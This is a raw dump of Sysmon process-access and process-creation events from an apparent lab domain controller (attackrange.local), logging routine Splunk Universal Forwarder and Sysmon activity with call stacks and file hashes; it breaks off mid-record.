10341000x80000000000000002603Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002602Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002601Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002600Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002599Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002598Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002597Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.508{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-855C-5FCF-7A00-000000009101}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002596Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.508{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-855C-5FCF-7A00-000000009101}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002595Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.311{10ACEC4A-855C-5FCF-7A00-000000009101}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002622Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.336{10ACEC4A-855D-5FCF-7B00-000000009101}22282704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002621Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.195{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-855D-5FCF-7B00-000000009101}2228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002620Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002619Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002618Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002617Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002616Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002615Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002614Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002613Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002612Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.195{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002611Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.195{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-855D-5FCF-7B00-000000009101}2228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002610Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.195{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-855D-5FCF-7B00-000000009101}2228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002609Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.196{10ACEC4A-855D-5FCF-7B00-000000009101}2228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002649Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.961{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002648Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002647Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002646Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL